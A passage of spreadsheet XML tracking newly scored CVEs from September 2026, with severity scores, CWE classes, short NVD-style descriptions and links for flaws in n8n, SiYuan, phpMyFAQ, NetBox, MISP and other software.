      <c r="E1304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1304" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1304" s="5" t="inlineStr"/>
      <c r="H1304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1304" s="5" t="inlineStr"/>
      <c r="J1304" s="5" t="inlineStr"/>
      <c r="K1304" s="5" t="inlineStr"/>
      <c r="L1304" s="5" t="inlineStr"/>
      <c r="M1304" s="5" t="inlineStr"/>
      <c r="N1304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1304" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1304" s="5" t="inlineStr"/>
      <c r="Q1304" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1304" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 pass message content in the Gmail (v1) and Brevo nodes to the mail composer without verifying it is a string. An authenticated user able to run a workflow can supply an expression that resolves to an object carrying a path or href property, causing the composer to read a local file accessible to the n8n process or fetch an internal URL (SSRF) and attach the result to the outgoing message.</t>
        </is>
      </c>
      <c r="S1304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85170</t>
        </is>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1305" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85451</t>
        </is>
      </c>
      <c r="D1305" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1305" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1305" s="5" t="inlineStr"/>
      <c r="H1305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1305" s="5" t="inlineStr"/>
      <c r="J1305" s="5" t="inlineStr"/>
      <c r="K1305" s="5" t="inlineStr"/>
      <c r="L1305" s="5" t="inlineStr"/>
      <c r="M1305" s="5" t="inlineStr"/>
      <c r="N1305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1305" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1305" s="5" t="inlineStr"/>
      <c r="Q1305" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R1305" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a remote process termination vulnerability in the SuicidalSleeper component that uses a hard-coded passphrase for multicast command authorization. Any multicast-reachable peer can enumerate MOOS processes and send termination commands to trigger process shutdown by exploiting the default multicast group and port with the known passphrase.</t>
        </is>
      </c>
      <c r="S1305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85451</t>
        </is>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85580</t>
        </is>
      </c>
      <c r="D1306" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1306" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1306" s="5" t="inlineStr"/>
      <c r="H1306" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1306" s="5" t="inlineStr"/>
      <c r="J1306" s="5" t="inlineStr"/>
      <c r="K1306" s="5" t="inlineStr"/>
      <c r="L1306" s="5" t="inlineStr"/>
      <c r="M1306" s="5" t="inlineStr"/>
      <c r="N1306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1306" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1306" s="5" t="inlineStr"/>
      <c r="Q1306" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1306" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path guard bypass vulnerability in the MCP file-access handler that uses case-sensitive matching on Linux filesystems. Attackers can read the protected publishAccess.json file by requesting case-variant paths like PublishAccess.json to disclose sensitive publish-access configuration and metadata.</t>
        </is>
      </c>
      <c r="S1306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85580</t>
        </is>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1307" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85582</t>
        </is>
      </c>
      <c r="D1307" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1307" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1307" s="5" t="inlineStr"/>
      <c r="H1307" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1307" s="5" t="inlineStr"/>
      <c r="J1307" s="5" t="inlineStr"/>
      <c r="K1307" s="5" t="inlineStr"/>
      <c r="L1307" s="5" t="inlineStr"/>
      <c r="M1307" s="5" t="inlineStr"/>
      <c r="N1307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1307" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1307" s="5" t="inlineStr"/>
      <c r="Q1307" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1307" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain an unbounded session creation vulnerability in the publish-service Basic Auth handler that allows authenticated attackers to exhaust memory. Attackers can repeatedly authenticate with valid credentials to create persistent session entries without expiry or capacity limits, causing indefinite process memory growth and denial of service.</t>
        </is>
      </c>
      <c r="S1307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85582</t>
        </is>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1308" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85590</t>
        </is>
      </c>
      <c r="D1308" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1308" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1308" s="5" t="inlineStr"/>
      <c r="H1308" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1308" s="5" t="inlineStr"/>
      <c r="J1308" s="5" t="inlineStr"/>
      <c r="K1308" s="5" t="inlineStr"/>
      <c r="L1308" s="5" t="inlineStr"/>
      <c r="M1308" s="5" t="inlineStr"/>
      <c r="N1308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1308" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1308" s="5" t="inlineStr"/>
      <c r="Q1308" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="R1308" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ before 4.1.8 contains an authentication bypass vulnerability in its two-factor authentication (TOTP) disable functionality. The removeTwofactorConfig() handler (reachable via POST /api/user/remove-twofactor) verifies only that the user is logged in and that a valid CSRF token is supplied, then disables TOTP without requiring password re-entry or a current TOTP code. The same downgrade is also reachable inline via PUT /api/user/data/update, which accepts a plain twofactor_enabled form field under the same session+CSRF-only guard. An attacker who has hijacked a user's session can silently strip two-factor protection from any account, including administrator accounts, after which password-only authentication succeeds.</t>
        </is>
      </c>
      <c r="S1308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85590</t>
        </is>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1309" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85654</t>
        </is>
      </c>
      <c r="D1309" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1309" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G1309" s="5" t="inlineStr"/>
      <c r="H1309" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1309" s="5" t="inlineStr"/>
      <c r="J1309" s="5" t="inlineStr"/>
      <c r="K1309" s="5" t="inlineStr"/>
      <c r="L1309" s="5" t="inlineStr"/>
      <c r="M1309" s="5" t="inlineStr"/>
      <c r="N1309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1309" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1309" s="5" t="inlineStr"/>
      <c r="Q1309" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R1309" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a template engine in the CDK generator in Amazon awslabs.dynamodb-mcp-server before 2.1.6 might allow a context-dependent actor to execute arbitrary code on the host that deploys the generated application via crafted table, index, or attribute names in a data model file.</t>
        </is>
      </c>
      <c r="S1309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85654</t>
        </is>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1310" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85689</t>
        </is>
      </c>
      <c r="D1310" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1310" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1310" s="5" t="inlineStr"/>
      <c r="H1310" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1310" s="5" t="inlineStr"/>
      <c r="J1310" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K1310" s="5" t="inlineStr"/>
      <c r="L1310" s="5" t="inlineStr"/>
      <c r="M1310" s="5" t="inlineStr"/>
      <c r="N1310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1310" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1310" s="5" t="inlineStr"/>
      <c r="Q1310" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1310"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S1310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85689</t>
        </is>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1311" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85787</t>
        </is>
      </c>
      <c r="D1311" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1311" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G1311" s="5" t="inlineStr"/>
      <c r="H1311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1311" s="5" t="inlineStr"/>
      <c r="J1311" s="5" t="inlineStr"/>
      <c r="K1311" s="5" t="inlineStr"/>
      <c r="L1311" s="5" t="inlineStr"/>
      <c r="M1311" s="5" t="inlineStr"/>
      <c r="N1311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1311" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1311" s="5" t="inlineStr"/>
      <c r="Q1311" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R1311" s="5" t="inlineStr">
        <is>
          <t>An incomplete list of disallowed inputs in the SQL validation component in Amazon awslabs postgres-mcp-server before  version 1.1.7 might allow an unauthenticated actor to modify data beyond the read-only scope by placing crafted SQL into the content that is submitted when an authenticated user interacts with the MCP server.
To remediate this issue, users should upgrade to version 1.1.7 or above.</t>
        </is>
      </c>
      <c r="S1311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85787</t>
        </is>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86074</t>
        </is>
      </c>
      <c r="D1312" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1312" s="5" t="inlineStr"/>
      <c r="H1312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1312" s="5" t="inlineStr"/>
      <c r="J1312" s="5" t="inlineStr"/>
      <c r="K1312" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L1312" s="5" t="inlineStr"/>
      <c r="M1312" s="5" t="inlineStr"/>
      <c r="N1312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1312" s="5" t="inlineStr"/>
      <c r="Q1312" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1312" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the Instance AI credential setup flow accepted a credential test or verification URL without checking that it matched the workflow node's origin. Attacker-controlled fetched content could influence that URL after a user injected it into the setup flow, causing authenticated requests, redirects, or probes to reach another origin. The affected logic includes packages/@n8n/instance-ai/src/tools/workflows/credential-utils.ts and the extractServiceOrigin origin derivation. This issue is fixed in versions 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="S1312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t>
        </is>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86081</t>
        </is>
      </c>
      <c r="D1313" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1313" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1313" s="5" t="inlineStr"/>
      <c r="H1313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1313" s="5" t="inlineStr"/>
      <c r="J1313" s="5" t="inlineStr"/>
      <c r="K1313" s="5" t="inlineStr"/>
      <c r="L1313" s="5" t="inlineStr"/>
      <c r="M1313" s="5" t="inlineStr"/>
      <c r="N1313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1313" s="5" t="inlineStr"/>
      <c r="Q1313" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R1313" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Git node clone operation matched an attacker-controlled destination path against the default N8N_BLOCK_FILE_PATTERNS regular expression. The pattern ^(./).git(/.)$ allowed catastrophic backtracking and ran synchronously in the main n8n process. An authenticated workflow editor could therefore freeze the instance with one workflow execution; the affected default is declared in packages/@n8n/config/src/configs/security.config.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="S1313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t>
        </is>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1314" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86091</t>
        </is>
      </c>
      <c r="D1314" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1314" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1314" s="5" t="inlineStr"/>
      <c r="H1314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1314" s="5" t="inlineStr"/>
      <c r="J1314" s="5" t="inlineStr"/>
      <c r="K1314" s="5" t="inlineStr"/>
      <c r="L1314" s="5" t="inlineStr"/>
      <c r="M1314" s="5" t="inlineStr"/>
      <c r="N1314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1314" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1314" s="5" t="inlineStr"/>
      <c r="Q1314" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1314" s="5" t="inlineStr">
        <is>
          <t>ntopng before 6.7.260717 fails to check user privileges in the pools bulk-delete endpoint, allowing authenticated non-administrators to delete all host pools and member bindings. Attackers can issue POST requests to the delete pools endpoint to irreversibly destroy every host pool, removing traffic policy bindings and visibility restrictions that may bypass security policies.</t>
        </is>
      </c>
      <c r="S1314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86091</t>
        </is>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1315" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86111</t>
        </is>
      </c>
      <c r="D1315" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1315" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1315" s="5" t="inlineStr"/>
      <c r="H1315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1315" s="5" t="inlineStr"/>
      <c r="J1315" s="5" t="inlineStr"/>
      <c r="K1315" s="5" t="inlineStr"/>
      <c r="L1315" s="5" t="inlineStr"/>
      <c r="M1315" s="5" t="inlineStr"/>
      <c r="N1315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1315" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1315" s="5" t="inlineStr"/>
      <c r="Q1315" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1315" s="5" t="inlineStr">
        <is>
          <t>BookWyrm through 0.9.1 fails to validate user visibility permissions in the status edit endpoint, allowing authenticated attackers to read followers-only and direct-message reviews by enumerating sequential status IDs. Attackers can access the raw content of restricted statuses through the edit view, bypassing the privacy protections documented for these message types.</t>
        </is>
      </c>
      <c r="S1315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86111</t>
        </is>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1316" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86113</t>
        </is>
      </c>
      <c r="D1316" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1316" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1316" s="5" t="inlineStr"/>
      <c r="H1316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1316" s="5" t="inlineStr"/>
      <c r="J1316" s="5" t="inlineStr"/>
      <c r="K1316" s="5" t="inlineStr"/>
      <c r="L1316" s="5" t="inlineStr"/>
      <c r="M1316" s="5" t="inlineStr"/>
      <c r="N1316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1316" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1316" s="5" t="inlineStr"/>
      <c r="Q1316" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1316" s="5" t="inlineStr">
        <is>
          <t>BookWyrm through 0.9.1 contains an authorization bypass vulnerability in the edit_readthrough function that allows authenticated users to modify other users' reading records. Attackers can exploit sequential ReadThrough IDs to overwrite arbitrary users' start dates, finish dates, progress, and progress mode, affecting reading statistics and exported data.</t>
        </is>
      </c>
      <c r="S1316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86113</t>
        </is>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1317" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86116</t>
        </is>
      </c>
      <c r="D1317" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1317" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1317" s="5" t="inlineStr"/>
      <c r="H1317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1317" s="5" t="inlineStr"/>
      <c r="J1317" s="5" t="inlineStr"/>
      <c r="K1317" s="5" t="inlineStr"/>
      <c r="L1317" s="5" t="inlineStr"/>
      <c r="M1317" s="5" t="inlineStr"/>
      <c r="N1317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1317" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1317" s="5" t="inlineStr"/>
      <c r="Q1317" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1317" s="5" t="inlineStr">
        <is>
          <t>Metabase versions before 0.63.1 fail to enforce data analyst permission checks on glossary API endpoints, allowing any authenticated user to create, modify, and delete glossary entries. Attackers can submit requests to POST, PUT, and DELETE glossary endpoints to tamper with instance-wide business glossary data without proper authorization.</t>
        </is>
      </c>
      <c r="S1317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86116</t>
        </is>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1318" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86175</t>
        </is>
      </c>
      <c r="D1318" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1318" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1318" s="5" t="inlineStr"/>
      <c r="H1318" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1318" s="5" t="inlineStr"/>
      <c r="J1318" s="5" t="inlineStr"/>
      <c r="K1318" s="5" t="inlineStr"/>
      <c r="L1318" s="5" t="inlineStr"/>
      <c r="M1318" s="5" t="inlineStr"/>
      <c r="N1318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1318" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1318" s="5" t="inlineStr"/>
      <c r="Q1318" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R1318" s="5" t="inlineStr">
        <is>
          <t>NetBox through 4.7.0 fails to redact sensitive data source backend credentials in REST and GraphQL API responses. Authenticated users with only view permission can retrieve plaintext passwords and secret keys for Git and Amazon S3 backends through API endpoints, gaining unauthorized access to external repositories and storage buckets.</t>
        </is>
      </c>
      <c r="S1318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86175</t>
        </is>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1319" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86283</t>
        </is>
      </c>
      <c r="D1319" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1319" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G1319" s="5" t="inlineStr"/>
      <c r="H1319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1319" s="5" t="inlineStr"/>
      <c r="J1319" s="5" t="inlineStr"/>
      <c r="K1319" s="5" t="inlineStr"/>
      <c r="L1319" s="5" t="inlineStr"/>
      <c r="M1319" s="5" t="inlineStr"/>
      <c r="N1319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1319" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1319" s="5" t="inlineStr"/>
      <c r="Q1319" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="R1319" s="5" t="inlineStr">
        <is>
          <t>MISP's UiBeta theme collection view (app/View/Themed/UiBeta/Collections/view.ctp) performed a secondary query of member events by UUID without applying the caller's access control list (ACL). The CollectionsController::view() action correctly resolved collection element UUIDs through Event::fetchSimpleEvents($user, ...), which enforces per-user event ACL. However, the view template independently re-queried the same UUIDs using only an Event.uuid IN (...) condition, omitting the createEventConditions() authorization filter. Because collection element UUIDs are stored without server-side authorization against the referenced event (CollectionElementsController::add() accepts whatever UUID the collection owner posts), an authenticated user with view access to a collection could retrieve full details of events they are not permitted to read. The exposed data included event identifiers, info, dates, timestamps, creator organization, all event tags, and galaxy clusters (the latter attached via a cluster-scoped rather than event-scoped ACL check). This constitutes an authorization bypass at the presentation layer, allowing horizontal privilege escalation across event boundaries within the MISP instance.</t>
        </is>
      </c>
      <c r="S1319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86283</t>
        </is>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86713</t>
        </is>
      </c>
      <c r="D1320" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1320" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
